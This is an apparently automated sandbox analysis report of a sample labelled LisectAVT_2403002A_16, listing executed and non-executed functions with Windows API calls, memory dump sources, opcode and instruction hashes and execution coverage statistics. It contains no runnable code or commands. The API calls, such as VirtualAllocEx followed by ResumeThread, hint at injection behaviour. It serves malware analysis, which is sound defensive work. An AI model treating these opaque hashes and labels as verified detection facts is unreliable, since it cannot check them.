                                                  • Opcode Fuzzy Hash: f100a0d0bba4d197fec1eddc736809826ad17592d4c4e3b6dc10ff4d2afa647f
                                                  • Instruction Fuzzy Hash: 32115672900248DFCB20DFAAC845BEFBBF5EF88324F148419E559A7250C775A544CFA4
                                                  Function 0130A870 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0130B101,00000800,00000000,00000000), ref: 0130B312
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721066910.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1300000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 7f831569065e1c16148dc87307e87d13b0693e4a740a696a56349e7dc096eb08
                                                  • Instruction ID: 86cf75080362f35487ced5a89e4309d307fc2981d722972f047a115285552459
                                                  • Opcode Fuzzy Hash: 7f831569065e1c16148dc87307e87d13b0693e4a740a696a56349e7dc096eb08
                                                  • Instruction Fuzzy Hash: 1F1112BA9003499FDB20CF9AD444ADEFBF8EF48314F10842AE959A7350C375A944CFA4
                                                  Function 05A89390 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05A893FE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 904707ebc689202b851e68d760d3c5c5f6096ca3ebd3d9953fd16eadff0f32c3
                                                  • Instruction ID: 638d211379189ee6c0c8b58ce736c6bc3e3d0f7d2e5a6b1b03a2b2d21f48419e
                                                  • Opcode Fuzzy Hash: 904707ebc689202b851e68d760d3c5c5f6096ca3ebd3d9953fd16eadff0f32c3
                                                  • Instruction Fuzzy Hash: FA1126729002499FCB10DFAAC844AEFBBF5EF88324F108419E559A7250C775A554CFA4
                                                  Function 0130B2A3 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0130B101,00000800,00000000,00000000), ref: 0130B312
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721066910.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1300000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 09d6af2b2c7c6fc3313cb8316d2684127611181ae36fc936d8782d080f802e00
                                                  • Instruction ID: 8f8164677ad04a17076e658c96c9fa03ae8ea271104f34f1d23e33ab5f6b4482
                                                  • Opcode Fuzzy Hash: 09d6af2b2c7c6fc3313cb8316d2684127611181ae36fc936d8782d080f802e00
                                                  • Instruction Fuzzy Hash: CA1123BA8002498FDB14CFAAC444ADEFBF4EF88314F10846AD959A7251C375A545CFA0
                                                  Function 05A88990 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,4005A5D3), ref: 05A889FA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: c2a26a34364e75ba6d9385a03a69f1ee154c40cbfff315b3d47b4e8d27a16550
                                                  • Instruction ID: dfdff24a1003c765e27eb2fde187e4e0ad5b319b645a0cc01e680e9ec07d5a83
                                                  • Opcode Fuzzy Hash: c2a26a34364e75ba6d9385a03a69f1ee154c40cbfff315b3d47b4e8d27a16550
                                                  • Instruction Fuzzy Hash: 6B115BB19042498BCB20DFAAC444BEFFFF4AF88324F108819D599A7250CB39A944CB94
                                                  Function 05A88998 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,4005A5D3), ref: 05A889FA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 9f4aaf96f8062555270f15c84fdc7d9c932217feb5157f6980e56bd1af738bba
                                                  • Instruction ID: 4641c3a022d7f136d9c82ba6fb7a430011cb8db4c8f77f321a5571f22d25f56b
                                                  • Opcode Fuzzy Hash: 9f4aaf96f8062555270f15c84fdc7d9c932217feb5157f6980e56bd1af738bba
                                                  • Instruction Fuzzy Hash: B5113AB19042498FCB20DFAAC4457EEFBF4EF88324F208819D459A7250CB79A544CF95
                                                  Function 0130B01B Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0130B086
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721066910.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1300000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: ea619777abd79dbc4be9d413c819c8b3abd478a737aea2360bececf7d0901b95
                                                  • Instruction ID: 6723c5c4396b67fbba1451a787b6c7efe84047d78aad76b57912eb3db7808669
                                                  • Opcode Fuzzy Hash: ea619777abd79dbc4be9d413c819c8b3abd478a737aea2360bececf7d0901b95
                                                  • Instruction Fuzzy Hash: F41120B6C002498FDB20CFAAD444ADEFBF4AF88314F14845AC468B7251C375A549CFA0
                                                  Function 0130B020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0130B086
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721066910.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1300000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: a3fe88b011a9b035197d34472241746fdcb4241f5709ed1b7b13cd2040e3e500
                                                  • Instruction ID: 322d3b4c63b52b25993baa9688bf612fe1b72417290ee6f0b772635c0acd885c
                                                  • Opcode Fuzzy Hash: a3fe88b011a9b035197d34472241746fdcb4241f5709ed1b7b13cd2040e3e500
                                                  • Instruction Fuzzy Hash: A511D2B6C003498FDB20DF9AD444ADEFBF4AB48314F10841AD569B7250C375A545CFA5
                                                  Function 05A8DFC9 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 05A8E02D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: 6d3f46860278fb340ef79c4d06f489fd2ca058e071c7626ba309c5b28f3864bd
                                                  • Instruction ID: 07bf9a1451e261e7bb57cc0281f80789f2f92641d5b1e85ff8536feac6a9ee1f
                                                  • Opcode Fuzzy Hash: 6d3f46860278fb340ef79c4d06f489fd2ca058e071c7626ba309c5b28f3864bd
                                                  • Instruction Fuzzy Hash: 141125B5800349CFDB10DF99D944BEEBBF8FB08310F14884AD458A7211C379A544CFA0
                                                  Function 05A8AB50 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 05A8E02D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: fce9ad2214c97333eb1ea8ca46d7129ced15f097fa72f0121f2076e64a900242
                                                  • Instruction ID: 33e60376e6139d92c7f2cd81844a6099ff15262f7f836a0ef1ae2297ffa605b0
                                                  • Opcode Fuzzy Hash: fce9ad2214c97333eb1ea8ca46d7129ced15f097fa72f0121f2076e64a900242
                                                  • Instruction Fuzzy Hash: AB11F2B5804348DFCB20DF9AD844BEEBBF8EB48324F108419E958A7300D375A984CFA5
                                                  Function 0129D1FC Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1720479037.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_129d000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fa055cdb8a87e831d472cd8e7a4a69cf9ea73870acaee51c414d923206a16892
                                                  • Instruction ID: 1ca4f83db2e00bb59bac0d213fc00754a9b38ad305b4fe26dade716f3cf83d54
                                                  • Opcode Fuzzy Hash: fa055cdb8a87e831d472cd8e7a4a69cf9ea73870acaee51c414d923206a16892
                                                  • Instruction Fuzzy Hash: 6521F471914208DFDF05DF98D9C4B2ABF65FB88320F20C5A9E9090A257C376D416DBA1
                                                  Function 012AD01C Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1720585679.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_12ad000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5dec96502a32a74f86f852fd373e6350494b27d9a8ee8dc5991a95211f495148
                                                  • Instruction ID: ffa64ab6cebec9c618dfeb10ee761fc0a0bf756fde56c6242040ee7c109ec5f7
                                                  • Opcode Fuzzy Hash: 5dec96502a32a74f86f852fd373e6350494b27d9a8ee8dc5991a95211f495148
                                                  • Instruction Fuzzy Hash: CC216470294208DFCB11DF68D9C0B26BFA1FB88314F60C56DD90A4B656C37BD407CA61
                                                  Function 012AD1D4 Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1720585679.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_12ad000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 45187ff6465b283bb8d9e233ab31898c1432f48c9e2f75189b3216ccd282cf09
                                                  • Instruction ID: fe10be587888b007c5a38d6662418468528b8e0a6189df10f4dc1bf9fad838ae
                                                  • Opcode Fuzzy Hash: 45187ff6465b283bb8d9e233ab31898c1432f48c9e2f75189b3216ccd282cf09
                                                  • Instruction Fuzzy Hash: 29214671514208EFDB01DF98CAC0B26BBA5FB84324F60C66DE9094B657C37AD846CA61
                                                  Function 012AD006 Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1720585679.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_12ad000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4ce8673a6f43958d6b80a0f5c8b328d8298d3819c10128f122ceeb6f3c9a8c0d
                                                  • Instruction ID: a6c97783be22603693a32aa6bc9802ded76a8556a328c31105b4246d2312d2b7
                                                  • Opcode Fuzzy Hash: 4ce8673a6f43958d6b80a0f5c8b328d8298d3819c10128f122ceeb6f3c9a8c0d
                                                  • Instruction Fuzzy Hash: 1221B0714483849FCB03CF24D994711BF71EB46314F28C5DAD9498F6A7C33A980ACB62
                                                  Function 0129D1F7 Relevance: .1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1720479037.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_129d000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                                                  • Instruction ID: 98e4be779c527bef0f8698e4463c6da67b4a19e9a77f99a127bfb7bdfb9ee86a
                                                  • Opcode Fuzzy Hash: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                                                  • Instruction Fuzzy Hash: 8C21CD76804244CFDF06CF58D9C4B16BF62FB84324F24C1AADD080A257C33AD42ADBA1
                                                  Function 012AD1CF Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1720585679.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_12ad000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                  • Instruction ID: 6cbf149e0b167613253fcf4347b9d45a4fff452cebfbc2f244c48e1e8f304eae
                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                  • Instruction Fuzzy Hash: 2511BB75504284DFDB02CF54C5C4B15BFA1FB84324F24C6AAD9494B6A7C33AD40ACB61
                                                  Function 0A830448 Relevance: .0, Instructions: 14COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1730916890.000000000A830000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A830000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a830000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: df417b31f364badd1e1f6a117e9805d07cbc8734d04e06fb72caaf437245dae6
                                                  • Instruction ID: c3c33cc68e1788b7aabf981a77a03eb7088e826f968308106ba7a2242d90dd03
                                                  • Opcode Fuzzy Hash: df417b31f364badd1e1f6a117e9805d07cbc8734d04e06fb72caaf437245dae6
                                                  • Instruction Fuzzy Hash: A6D0123714410C5E8B81EE95E800D5277ECBB147407008462E548CB421E621F534DB91

                                                  Non-executed Functions

                                                  Function 05A872B8 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 30da370c2e75fe5a3a584df15da62ffbecf0074ca9d488fc67defdb276735f70
                                                  • Instruction ID: ead77574a850ad72a5af1068b308b7ad97b8b481fc40528065f72c1d9a2e2216
                                                  • Opcode Fuzzy Hash: 30da370c2e75fe5a3a584df15da62ffbecf0074ca9d488fc67defdb276735f70
                                                  • Instruction Fuzzy Hash: E8E10B74E141198FDB14DFA9C5809AEFBF2FF89304F24816AE414AB356D731A942CFA1
                                                  Function 05A88F58 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 47e9e47e8337f248e1c72d18f6b5c9b3b53a2a576defa96872dd328c44b3247f
                                                  • Instruction ID: 667f9462bb18894dcfef414857446f0e4a4c688b03830c31356d137b9b6c95f6
                                                  • Opcode Fuzzy Hash: 47e9e47e8337f248e1c72d18f6b5c9b3b53a2a576defa96872dd328c44b3247f
                                                  • Instruction Fuzzy Hash: BFE1F874E041199FDB14DFA9C5809AEFBF2FF89304F24816AE415AB35AD730A942CF61
                                                  Function 05A86E80 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d61837b6b4e1351c2804640dd68a91596eeb685af840cfbe5d1c84bb683a5c17
                                                  • Instruction ID: 43f87d701a40f197eb2c2be7146d39e960a531366e7c51136aa220cf591ef485
                                                  • Opcode Fuzzy Hash: d61837b6b4e1351c2804640dd68a91596eeb685af840cfbe5d1c84bb683a5c17
                                                  • Instruction Fuzzy Hash: 61E1E774E041198FDB14DFA9C5809AEFBF2FF89304F24816AE415AB356D731A982CF60
                                                  Function 05A88B20 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d19654f1aefba35d128c1e7cb244c914a7b3462432809d5d901ec1baa67924ad
                                                  • Instruction ID: e1b0d6e02c0f1e66d31a196a80ff23c2a253786c53c48a46ac0e1a919052b034
                                                  • Opcode Fuzzy Hash: d19654f1aefba35d128c1e7cb244c914a7b3462432809d5d901ec1baa67924ad
                                                  • Instruction Fuzzy Hash: B8E11D74E011198FDB14DFA9C5809AEFBB2FF89304F24855AE415AB35ADB34AD42CF60
                                                  Function 05A86A48 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d78d948359444f6442d66f3e754ebb4fc13528caf6e6aba685ed830f85f0822c
                                                  • Instruction ID: 1fa636824b3860b27490b03525563f225108636a358e3fd548efda43b362f730
                                                  • Opcode Fuzzy Hash: d78d948359444f6442d66f3e754ebb4fc13528caf6e6aba685ed830f85f0822c
                                                  • Instruction Fuzzy Hash: C9E1FA74E041198FDB14DFA9C5809AEFBF2FF89304F24816AD415AB356D730A942CF65
                                                  Function 05A80006 Relevance: .3, Instructions: 289COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a480b2e24d974f657f928d170363b23524e5c254eee4d64d6b832af49c9cdd08
                                                  • Instruction ID: abdbe34071627e70e479d5eea76963d0b37cedfd38bc69f89cead3cce020d2ca
                                                  • Opcode Fuzzy Hash: a480b2e24d974f657f928d170363b23524e5c254eee4d64d6b832af49c9cdd08
                                                  • Instruction Fuzzy Hash: B4C1D670D05268CFDB64DFA5C848BEDBBB2FF4A304F0191AAD459A7251EB74098ACF11
                                                  Function 05A80040 Relevance: .3, Instructions: 266COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 33daf868c7ccbe7b91a4e45f60515ae8641e4530eb5d86c585d682aa1fdc688f
                                                  • Instruction ID: d08c3ccd28a472fae390b4c585b6b823c02de13e49169ddd9dcb990f53cdd535
                                                  • Opcode Fuzzy Hash: 33daf868c7ccbe7b91a4e45f60515ae8641e4530eb5d86c585d682aa1fdc688f
                                                  • Instruction Fuzzy Hash: 35B1A270D05228CFDB64DFA5C848BEEBBB6FF4A300F1091A9D419A7251EB741989CF11
                                                  Function 0130DC74 Relevance: .3, Instructions: 264COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721066910.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1300000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5b3ee469e19c8bb2edd4b959941681a8065483d42826aeaa86d8f105df49586f
                                                  • Instruction ID: 80849cce7ac15f804a4e896f90bff85b118d595fe1df6bf5e376d2614731515e
                                                  • Opcode Fuzzy Hash: 5b3ee469e19c8bb2edd4b959941681a8065483d42826aeaa86d8f105df49586f
                                                  • Instruction Fuzzy Hash: BAA19F36E0020ACFCF16DFB8C85059EBBF6FF84304B15456AE905AB2A5DB71E955CB80
                                                  Function 05A80620 Relevance: .2, Instructions: 160COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 45b3128b9f83f558de4c690bfeec4e21ca3e1741ac0c9463ce405e7565ef51a7
                                                  • Instruction ID: 519c65b6624f20f0ea64548a20e592df582523a943cff5960035b43d48c29a99
                                                  • Opcode Fuzzy Hash: 45b3128b9f83f558de4c690bfeec4e21ca3e1741ac0c9463ce405e7565ef51a7
                                                  • Instruction Fuzzy Hash: 5761E174E055199FCB04DFAAD5849AEFBF2FF88300F24C169E409A7355DA30A946CF90
                                                  Function 05A86A15 Relevance: .2, Instructions: 150COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b6bfda7f3d4b4fc91e89b291e0a79ce6bedcebca0dd28d3ce513f471c88748b6
                                                  • Instruction ID: 483ef7012cd289a294061365d40a96113b3e97106ad25306aae0b511e974b69f
                                                  • Opcode Fuzzy Hash: b6bfda7f3d4b4fc91e89b291e0a79ce6bedcebca0dd28d3ce513f471c88748b6
                                                  • Instruction Fuzzy Hash: D7512B70E052198BDB14DFA9C9449AEBBF2FF89304F24816AD418AB356D7309942CFA1
                                                  Function 05A88F48 Relevance: .1, Instructions: 133COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2d9c4056c3694057f34ebcf9841b1a8babf9f4db7f8141f09a1878331683e0ac
                                                  • Instruction ID: 516a7e10f65ed953e94dc5decd4c2946c84d2f4b4d0d6d79f982f40fbf514aee
                                                  • Opcode Fuzzy Hash: 2d9c4056c3694057f34ebcf9841b1a8babf9f4db7f8141f09a1878331683e0ac
                                                  • Instruction Fuzzy Hash: 9951FC70E042199FDB14DFAAC5819AEFBB2FF89304F24C16AD418A7356D7319942CFA1
                                                  Function 05A80611 Relevance: .1, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 330d558b2af7cf8528b5954ae076d9c0db6877c569885725699881ae6f182119
                                                  • Instruction ID: c8247deef3f9cd5eabe08734db8e197b2ca4e74eab1fe88384e61452d52025dd
                                                  • Opcode Fuzzy Hash: 330d558b2af7cf8528b5954ae076d9c0db6877c569885725699881ae6f182119
                                                  • Instruction Fuzzy Hash: E741E675E015189FDB08DFAAC884AAEFBF2FF88310F14C56AD408A7355DA309946CB50

                                                  Execution Graph

                                                  Execution Coverage:7.3%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:5
                                                  Total number of Limit Nodes:0
                                                  execution_graph 30965 138ae98 DuplicateHandle 30966 138af2e 30965->30966 30962 6603f78 30963 6603fbe GlobalMemoryStatusEx 30962->30963 30964 6603fee 30963->30964

                                                  Executed Functions

                                                  Function 06686338 Relevance: 7.9, Strings: 5, Instructions: 1635COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q$$^q$$^q$$^q
                                                  • API String ID: 0-358201761
                                                  • Opcode ID: 6d3f08566a75528f97709377918cf1b33db66dc0a4c0125e15893ea16549c141
                                                  • Instruction ID: becef379f3706cb91664b10387039957c83b76674ee720a2efe580ee54bbb1ae
                                                  • Opcode Fuzzy Hash: 6d3f08566a75528f97709377918cf1b33db66dc0a4c0125e15893ea16549c141
                                                  • Instruction Fuzzy Hash: 7EE23930E002198FCB64EB68C994A9DB7F2EF85304F5486A9D449EB365EB70ED85CB41
                                                  Function 0668C218 Relevance: 6.8, Strings: 5, Instructions: 514COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
